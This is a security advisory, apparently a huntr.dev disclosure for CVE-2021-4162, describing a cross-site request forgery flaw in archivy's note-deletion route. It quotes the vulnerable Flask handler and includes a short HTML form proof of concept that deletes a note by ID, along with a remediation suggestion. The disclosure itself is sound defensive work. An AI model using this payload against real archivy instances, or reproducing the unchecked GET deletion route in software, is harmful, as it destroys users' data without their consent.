Lucene search
Scara31E204A768-2129-4B6F-ABAD-E436309C7C32HistoryDec 22, 2021 - 6:32 a.m.
Cross-Site Request Forgery (CSRF) in archivy/archivy
2021-12-2206:32:35
scara31
www.huntr.dev
5
csrf
token validation
note deletion
archivy
EPSS
0.001
Percentile
31.5%
Title
Missing CSRF token validation leads to note deletion.
Summary
Route /dataobj/delete/<int:dataobj_id> is responsible for note deletion. Instead of POST it accepts GET and DELETE methods.
@app.route("/dataobj/delete/<int:dataobj_id>", methods=["DELETE", "GET"])
def delete_data(dataobj_id):
try:
data.delete_item(dataobj_id)
except BaseException:
flash("Data could not be found!", "error")
return redirect("/")
flash("Data deleted!", "success")
return redirect("/")
While they both contain CSRF tokens, in fact the token is not verified, so it is possible to exclude it from query which leads to CSRF.
Steps to reproduce
- 1. Create any note, get it’s ID.
- 2. Run page from
PoC.htmlwith concrete ID in your browser, click the button. - 3. Observe that the note with specified ID was deleted.
Proof of Concept
// PoC.html
<form action="http://127.0.0.1:5000/dataobj/delete/{yourNoteID}" method="GET">
<input type="submit" value="Click me"/>
</form>
Possible remediation
Use POST method instead and verify CSRF token.
Impact
This vulnerability is capable of deleting user’s notes.
Related
prion
prion
Cross site request forgery (csrf)
2021-12-25 12:15:00
github
github
archivy is vulnerable to Cross-Site Request Forgery (CSRF)
2022-01-06 21:59:50
osv
osv
PYSEC-2021-869
2021-12-25 12:15:00
CVE-2021-4162
2021-12-25 12:15:17
archivy is vulnerable to Cross-Site Request Forgery (CSRF)
2022-01-06 21:59:50
veracode
veracode
Cross-site Request Forgery (CSRF)
2021-12-27 15:45:17
nvd
nvd
CVE-2021-4162
2021-12-25 12:15:17
cvelist
cvelist
CVE-2021-4162 Cross-Site Request Forgery (CSRF) in archivy/archivy
2021-12-25 11:20:09
cve
cve
CVE-2021-4162
2021-12-25 12:15:17